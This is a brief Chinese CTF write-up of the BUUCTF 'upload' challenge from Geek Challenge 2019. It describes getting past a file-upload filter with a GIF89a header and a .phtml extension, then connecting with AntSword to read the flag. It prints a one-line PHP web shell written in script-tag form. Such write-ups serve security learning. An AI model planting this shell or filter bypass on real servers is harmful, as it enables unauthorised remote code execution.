极客大挑战2019-upload

 · 2020-7-9  ·次阅读


地址:buuctf

1

上传界面

2

过滤了<?那就尝试不带<?的,前几天遇到过

3

还要满足图片,

GIF89a? <script language="php">eval($_POST[a]);</script>

PHP后缀的话可以用PHP3、PHP4、phtml绕过,这里只能用phtml

上传文件都在upload目录下,蚁剑连接,在根目录下得到flag